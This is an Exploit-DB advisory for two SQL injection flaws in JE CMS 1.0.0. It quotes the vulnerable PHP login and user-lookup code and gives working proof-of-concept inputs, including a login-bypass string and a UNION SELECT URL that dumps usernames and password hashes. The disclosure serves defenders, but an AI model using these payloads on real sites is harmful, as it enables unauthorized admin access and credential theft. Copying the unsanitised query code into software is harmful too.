JE CMS 1.0.0 - Authentication Bypass

EDB-ID:

15141

CVE:

N/A

EDB Verified:

Author:

Abysssec

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2010-09-28

Vulnerable App: 
'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/moaub-28-je-cms-1-0-0-bypass-authentication-by-sql-injection-vulnerability/
'''

 
Title  : JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability
Affected Version : JE CMS <= 1.0.0
Vendor  Site   : joenasejes.cz.cc
Discovery : abysssec.com
  
 
Vulnerabilites :

1. Bypass Authentication by SQL Injection Vulnerability

in administrator\login.php page, lines 16-20:
if (isset($_REQUEST['username'])) {
	$username = $_REQUEST['username'];
	$password = $_REQUEST['password'];
	$result = $core->userLogin();
	
	
userLogin() function is in administrator\library\functions.php. in lines 129-139:
		if ($userName == '' || $password == '') {
			$errorMessage = JE_MISMATCH_USERNAME_PASSWORD;
		}  else {
			// check the database and see if the username and password combo do match
			$sql = "SELECT userid
					FROM users 
					WHERE username = '".$userName."' 		// vulnerability is here
					AND password = '".$this->getHash($password)."'	// vulnerability is here
					AND usertype = 1
					AND block = 0";
			$result = $this->JEQuery($sql);

POC:

in administrator/login.php:

username: admin' or '1'='1
password: admin' or '1'='1

2. SQL injection in administrator\index.php on "userid" parameter:

in administrator\index.php file line 12:
$userid			= 	$_REQUEST['userid'];
lines 52-53:
	case 'edituser' :
		$user = $core->getUser($userid);
		
getUser function is in administrator\library\functions.php file. lines 578-583:

	function getUser($id){
		
		$sql = "SELECT *
				FROM users
				WHERE userid = ".$id;	// vulnerability is here
		$result = $this->JEQuery($sql);

POC:

http://site/joenas-ejes/administrator/index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services